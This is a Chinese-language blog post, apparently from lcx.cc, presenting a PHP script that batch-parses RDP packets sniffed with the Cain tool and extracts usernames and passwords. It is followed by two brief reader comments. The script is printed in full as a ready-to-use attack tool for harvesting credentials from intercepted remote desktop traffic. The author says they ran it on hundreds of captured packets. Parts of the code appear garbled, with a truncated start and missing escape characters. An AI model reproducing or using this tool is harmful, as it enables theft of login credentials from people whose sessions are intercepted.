Cain嗅探到的RDP包批量解析为用户名+密码的php脚本

  • A+
所属分类:lcx

昨天晚上开始嗅探,好家伙好几百个包,网上搜了一下有一款工具叫“Cain RDP Parser”,好家伙,一个一个选,玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。

Cain嗅探到的RDP包批量解析为用户名+密码的php脚本

 $value) { 
    if($value!='.' && $value!='..') 
    { 
      rdpParser($argv[1].$value); 
    } 
  } 
}elseif(is_file($argv[1])) 
{ 
  rdpParser($argv[1]); 
} 

function rdpParser($filename){ 
  $crlf = "rn"; 
  if(!file_exists($filename)){ 
    print "file "$filename" not exists...$crlf"; 
    return; 
  } 
  $rdpH=fopen($filename,'r'); 
  print "FILE:".basename($filename).$crlf; 
  fseek($rdpH,0); 
  while (!feof($rdpH)) { 
    $line=trim(fgets($rdpH)); 
    if(preg_match("/w+.address:.*?$/",$line,$m)) 
    { 
      print $line.$crlf; 
    } 
    if(preg_match("/^[Client decrypted packet]/",$line,$m)) 
    { 
      $packet=''; 
      while (!empty($line)) { 
        $line=trim(fgets($rdpH)); 
        $packet.=substr($line,5,48); 
      } 
      $packets=explode('0000000000',str_replace(' ', '', $packet)); 
      $i=count($packets)-27; 
      $packets=explode('0000',$packets[$i]); 
      $times=0; 
      foreach ($packets as $key => $value) { 
        if(empty($value) || $times>=2)continue; 
        print (($times==0)?'username':'password').":t".pack('H*',$value).$crlf;
         $times++; 
         
      } 
      break; 
    } 
  } 
  fclose($rdpH); 
  print "-------------------------------$crlf"; 
} 
?>

留言评论(旧系统):

佚名 @ 2013-01-28 20:48:05

一般看IP,短时间内同一IP的都是爆破,记录下来更加蛋疼。。。

本站回复:

╮(╯_╰)╭

m @ 2013-01-29 01:14:36

4. 8 9 生成的不一样的 亲 你懂得一个版本一个样子 有差别关键字

本站回复:

╮(╯_╰)╭

文章来源于lcx.cc:Cain嗅探到的RDP包批量解析为用户名+密码的php脚本

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: